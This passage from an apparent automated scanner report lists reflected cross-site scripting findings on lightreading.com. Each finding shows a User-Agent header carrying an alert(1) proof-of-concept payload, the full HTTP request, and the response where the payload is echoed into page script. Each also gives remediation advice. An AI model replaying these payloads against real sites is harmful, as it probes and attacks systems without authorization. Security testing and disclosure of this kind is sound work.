<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)96ac9"-alert(1)-"64c7fe1d8e9"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aea16"-alert(1)-"f59567eb8a1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lr-cable/ HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aea16"-alert(1)-"f59567eb8a1
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:19:24 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 242353
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)aea16"-alert(1)-"f59567eb8a1"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce029"-alert(1)-"95f5be9abbc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lr-mobile HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ce029"-alert(1)-"95f5be9abbc
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:13:52 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 250814
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Unstrung, 4G, wireless, mobile, 2G, 2.5G, 3G, cellular, PCS, WAP, i-mode, WLAN, Bluetooth ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ce029"-alert(1)-"95f5be9abbc"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8af5b"-alert(1)-"e6150d7c244 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lr-mobile/ HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8af5b"-alert(1)-"e6150d7c244
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:54 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 250323
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Unstrung, 4G, wireless, mobile, 2G, 2.5G, 3G, cellular, PCS, WAP, i-mode, WLAN, Bluetooth ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8af5b"-alert(1)-"e6150d7c244"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86685"-alert(1)-"fb38ad261f4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /message.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)86685"-alert(1)-"fb38ad261f4
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 259987
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)86685"-alert(1)-"fb38ad261f4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 569db"-alert(1)-"4edf88eff36 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /messages.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)569db"-alert(1)-"4edf88eff36
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:38 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 266297
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)569db"-alert(1)-"4edf88eff36"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b98a"-alert(1)-"09ef647f1d2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /network-intelligence-benchmark-survey.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b98a"-alert(1)-"09ef647f1d2
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:20:43 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Cache-control: private
Content-Length: 165465
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b98a"-alert(1)-"09ef647f1d2"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e831c"-alert(1)-"42145f8b4f6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /policy-management/ HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e831c"-alert(1)-"42145f8b4f6
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:50 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 135702
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Policy Management, light reading, lightreading, magazine, telecom, telecommunications, In ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e831c"-alert(1)-"42145f8b4f6"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c9d2"-alert(1)-"c30d296f706 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.asp?piddl_userid=50 HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1c9d2"-alert(1)-"c30d296f706
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:16:37 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 175258
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1c9d2"-alert(1)-"c30d296f706"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 914dc"-alert(1)-"3517a7c3b8f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)914dc"-alert(1)-"3517a7c3b8f
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 174329
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)914dc"-alert(1)-"3517a7c3b8f"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13f8c"-alert(1)-"53d812fc6dc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quote.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)13f8c"-alert(1)-"53d812fc6dc
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:03:34 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 227282
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)13f8c"-alert(1)-"53d812fc6dc"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44f4b"-alert(1)-"d2574c37433 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /register.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)44f4b"-alert(1)-"d2574c37433
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:01:40 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 168822
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)44f4b"-alert(1)-"d2574c37433"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80fa3"-alert(1)-"b6286669c1b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resource-library.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)80fa3"-alert(1)-"b6286669c1b
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:11 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Sat, 11 Dec 2010 23:18:09 GMT
Expires: Sun, 10 Apr 2011 19:18:09 GMT
Etag: s200805.p200805
Content-Length: 186458
Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)80fa3"-alert(1)-"b6286669c1b"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2804"-alert(1)-"8c9ab16298d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e2804"-alert(1)-"8c9ab16298d
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:18:50 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 214332
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e2804"-alert(1)-"8c9ab16298d"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fa58"-alert(1)-"33573527a90 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1fa58"-alert(1)-"33573527a90
Connection: close
Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 00:02:11 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Sat, 11 Dec 2010 23:02:10 GMT
Expires: Sun, 10 Apr 2011 19:02:10 GMT
Etag: s200805.p200805
Content-Length: 174695
Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1fa58"-alert(1)-"33573527a90"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31b30"-alert(1)-"e139f47c396 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
